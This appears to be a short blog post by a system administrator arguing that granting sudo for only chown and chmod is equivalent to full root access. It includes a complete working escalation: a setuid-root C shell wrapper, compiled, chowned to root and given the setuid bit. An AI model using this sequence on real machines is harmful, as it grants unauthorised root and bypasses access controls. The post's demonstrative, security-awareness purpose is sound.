My predecessor(s) had left a bunch of people at my work place (not even developers) with sudo access to chown and chmod – for the purpose of data management. For a while I had tried to explain that having sudo access to just those two commands is effectively having full root access on the machines.
I had to demonstrate it. So I did:
cat <<EOF >> make-me-root.c
#include <unistd.h>
int main() {
setuid(0);
execv("/bin/bash", NULL);
return 0;
}
EOF
gcc -o make-me-root make-me-root.c
sudo chown root make-me-root
sudo chmod u+s make-me-root
./make-me-root
Alright, demonstrated. Now it’s time for the raising eyebrows to follow.
And now also comes the part where I know it’s almost impossible to revoke privileges from people after they got used to a broken workflow.
Bashing Linux 